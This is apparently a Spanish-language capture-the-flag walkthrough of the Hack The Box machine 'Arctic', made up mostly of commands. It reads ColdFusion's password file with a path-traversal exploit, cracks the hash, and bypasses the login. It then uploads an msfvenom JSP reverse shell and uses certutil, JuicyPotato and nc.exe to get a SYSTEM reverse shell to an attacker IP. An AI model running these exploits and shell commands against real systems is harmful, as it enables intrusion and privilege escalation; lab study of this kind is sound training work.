echo "10.129.151.59 arctic.htb" | sudo tee -a /etc/hosts

nmap -A -p- -oA output 10.129.151.59 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA arctic 10.129.151.59

nmap -sU -O -p- -oA arctic-udp 10.129.151.59

nikto -h 10.129.151.59:80

gobuster dir -k -u http://10.129.151.59/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

Pasted image 20210513083518.png

Pasted image 20210513083657.png

Pasted image 20210513083753.png

Pasted image 20210513084120.png

Podemos ver que en el login tiene Adobe Coldfusion Buscamos si existe un exploit

Pasted image 20210513084051.png

searchsploit -m multiple/remote/14641.py

Pasted image 20210513084327.png

python2 14641.py arctic.htb 8500 "../../../../../../../../ColdFusion8/lib/password.properties"

Pasted image 20210513084535.png

Usamos 100 porque sha1 es 100

.\hashcat64.exe -m 100 -a 0 .\hash.txt .\SecLists-master\Passwords\rockyou.txt

Pasted image 20210513085543.png

Pasted image 20210513085808.png

Hashcat dice que la contrasena es: happyday

En el formulario parece quese hace un cambio al texto con javascript

Pasted image 20210513090907.png

Despues de hacerlo como 10x Lo que tenia que hacer era usar burp suite y foxy proxy

Hacer esto lo mas rapido posible en 30 segundos

Pasted image 20210513093051.png

cambiar lo que dice en cfadminPassword y poner lo que te sale en la consola despues de correr lo siguiente en la consola de js

console.log(hex_hmac_sha1(document.loginform.salt.value, '2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03'));

Ir al formulario y poner happyday como contrasena

Vamos a system settings y mappings

Pasted image 20210513093419.png

Tomamos cuenta que el directorio es C:\ColdFusion8\wwwroot\CFIDE

Despues nos dirigimos a Debugging & Logging -> Scheduled Task

Pasted image 20210513094106.png

Pasted image 20210513094125.png

Trate de usar este script pero no me funciono: https://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/web-backdoors/cfm/cfExec.cfm

msfvenom -p java/jsp_shell_reverse_tcp LHOST=tun0 LPORT=5555 > arctic_shell.jsp

Bajar el codigo en esta pagina: https://forum.hackthebox.eu/discussion/116/python-coldfusion-8-0-1-arbitrary-file-upload

Y crear un archivo con ese codigo

python2 arb-file-exploit.py 10.129.151.59 8500 shell.jsp

rlwrap nc -lvnp 5555

Nos dirigimos a: http://10.129.151.59:8500/userfiles/file/exploit.jsp

Pasted image 20210513101252.png

Le damos click a save output to a file

Pasted image 20211227182647.png

Encontramos arctic_shell2.jsp en el index de CFIDE

Pasted image 20211227182841.png

nc -lvnp 443

Nos vamos con juicy potato cuando vemos SeImpersonatePrivilege

Pasted image 20211227183400.png

https://github.com/ohpe/juicy-potato/releases/tag/v0.1

certutil.exe -f -urlcache -split http://10.10.xx.xx/JuicyPotato.exe JuicyPotato.exe

python3 -m http.server 80

Pasted image 20211227183936.png

Hacemos un directorio en windows\temp

Pasted image 20211227184706.png

Tuve que agregar unos caracteres mas en la contrasena.

Pasted image 20211227185209.png

Para validar el usuario:

net user

Pasted image 20211227185320.png

JuicyPotato.exe -t * -l 1337 -p C:\Windows\System32\cmd.exe -a "/c \\10.10.xx.xx\smbFolder\nc.exe -e cmd 10.10.xx.xx 443"

Pasted image 20211227190312.png

nc -lvnp 443

Pasted image 20211227190003.png

boxes

copyright©2022 Cu3rv0x all rights reserved